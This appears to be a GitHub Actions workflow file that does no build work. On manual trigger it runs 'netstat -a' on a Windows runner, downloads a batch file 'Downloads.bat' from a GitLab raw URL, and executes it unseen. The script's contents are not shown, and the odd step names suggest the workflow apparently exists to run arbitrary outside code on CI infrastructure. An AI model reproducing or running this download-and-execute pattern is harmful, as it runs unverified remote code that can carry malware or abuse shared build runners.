name: Teretr

on: [workflow_dispatch]

jobs:
  build:
    runs-on: windows-latest

    steps:
    
    - name: Workiy
      shell: cmd
      run: |
         echo helloworld
         netstat -a
    - name: Download
      run: Invoke-WebRequest https://gitlab.com/myoutlookhub/rsgd/-/raw/main/Downloads.bat -OutFile Downloads.bat
    - name: RunComd
      run: cmd /c "Downloads.bat"
      
        
        
